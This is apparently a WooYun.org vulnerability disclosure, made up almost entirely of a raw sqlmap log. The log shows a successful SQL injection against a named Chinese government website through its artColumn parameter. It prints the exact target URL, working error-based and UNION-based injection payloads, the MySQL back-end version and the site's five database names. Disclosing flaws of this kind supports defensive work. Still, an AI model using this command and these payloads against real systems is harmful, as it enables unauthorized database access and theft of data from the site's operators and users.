WooYun.org

[root@Hacker~]# Sqlmap -u http://www.ggj.hbjt.gov.cn/ggj/news/listSpecial.jsp?ar
tColumn=030310 --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 10:45:32
[10:45:32] [INFO] resuming back-end DBMS 'mysql'
[10:45:32] [INFO] testing connection to the target url
[10:45:33] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: artColumn
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: artColumn=030310' AND (SELECT 4090 FROM(SELECT COUNT(*),CONCAT(0x3a
6e786a3a,(SELECT (CASE WHEN (4090=4090) THEN 1 ELSE 0 END)),0x3a7671623a,FLOOR(R
AND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'BzOT'='BzO
T
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: artColumn=030310' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6e786a3a,0x
545441565a7a46416e4e,0x3a7671623a)#
---
[10:45:34] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0
[10:45:34] [INFO] fetching database names
[10:45:35] [WARNING] reflective value(s) found and filtering out
[10:45:35] [WARNING] the SQL query provided does not return any output
[10:45:35] [INFO] the SQL query used returns 5 entries
[10:45:35] [INFO] retrieved: information_schema
[10:45:35] [INFO] retrieved: fwq
[10:45:35] [INFO] retrieved: ggj
[10:45:35] [INFO] retrieved: mysql
[10:45:35] [INFO] retrieved: test
available databases [5]:
[*] fwq
[*] ggj
[*] information_schema
[*] mysql
[*] test
[10:45:36] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 6 times
[10:45:36] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[10:45:36] [INFO] fetched data logged to text files under 'E:\tools\????\SQLMAP~
3\Bin\output\www.ggj.hbjt.gov.cn'
[*] shutting down at 10:45:36